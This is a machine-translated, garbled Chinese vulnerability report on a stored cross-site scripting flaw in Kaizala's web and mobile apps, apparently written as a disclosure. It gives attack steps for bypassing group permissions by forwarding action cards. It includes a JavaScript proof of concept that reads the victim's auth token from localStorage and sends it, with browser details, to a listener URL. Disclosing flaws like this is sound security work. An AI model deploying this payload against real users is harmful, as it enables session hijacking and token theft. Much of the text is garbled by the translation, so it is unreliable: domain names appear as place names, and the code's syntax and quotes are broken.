在webapp.kaiza跨站点脚本。洛杉矶和kaizala移动应用程序

在webapp.kaiza站得住脚的发现了一个问题。洛杉矶和kaizala向前移动应用程序,允许攻击者自定义动作卡私人或公共团体,即使他们没有权限发送消息或操作卡片组。自定义动作卡可以执行javascript由攻击者,这可能导致存储跨站点脚本负载。

这意味着自定义动作可以理论上抓住webapp.kaiza web客户端用户的授权令牌。洛杉矶,和漏出/操作数据为用户在移动应用程序。值得注意的是,移动应用程序,这需要移动用户首先接受一个提示信任自定义动作(webapp.kaiza不存在这样的提示。用户报告的时候)。

通常情况下,自定义动作不能发送到组中发送方不是一个管理/一群没有补充说,行动,然而可以绕过这个限制通过转发的已经送行动从一群攻击者是一个管理员。

更简洁,这种攻击的步骤是:

1. 恶意攻击者上传自定义动作(留下一个恶意的javascript载荷在summary视图)。
2. 攻击者发送的行动,一群管理员。
3. 向前攻击者的行动,一群他们不能发送自定义动作(如公共团体允许聊天)。
4. 如果受害者点击操作查看摘要视图,恶意javascript将运行(可能允许攻击者执行代表受害者的行为或窃取受害者的授权令牌)。

的概念:

使用简单的公告行动模板,攻击者可以创建一个自定义的动作在manage.kaiza。洛杉矶,它包含恶意javascript将执行如果用户单击操作,并接受选择信任行动卡所示的对话框。

一个简单的例子可以通过附加以下的showSummaryPage ()函数。这个有效载荷不同的东西如果受害者是触发它的应用或者移动应用程序。

• Web应用程序:抓住用户的ac.auth令牌和浏览器的信息并将其发送给监听服务器,并触发警报()框表示。
• 移动应用:将受害者的浏览器客户端信息发送到监听服务器,并触发警报使用KASClient库是showAlert函数。

函数showSummaryPage () {var res = new XMLHttpRequest ();如果(KASClient.getPlatform () = = 5) {res.open(“文章”、“https://webapp.kaiza.la/fakeurl”);res.send (JSON.stringify (“ac。身份验证令牌:::“+ parent.localStorage.getItem”(“ac.authToken”)) +客户端信息:::“+ JSON.stringify (clientInformation.appVersion));警报(“站不住脚:发送身份验证令牌从起源和客户端浏览器的信息:“+ this.parent.location.origin);其他}{res.open(“文章”、“https://webapp.kaiza.la/fakeurl”);res.send(“客户信息:::”+ JSON.stringify (parent.clientInformation.appVersion));KASClient。showAlert(“站不住脚:客户信息发送到测试领域。这个页面的起源:“+ this.parent.location.origin); }

在创建一个恶意的行动:

1. 上传和发布attacker-controlled组织的行动

2. 发送attacker-controlled集团的行动

3. 提出公共/私人组织的行动,你将不能够发送自定义动作/引发跨站点脚本漏洞攻击其他用户。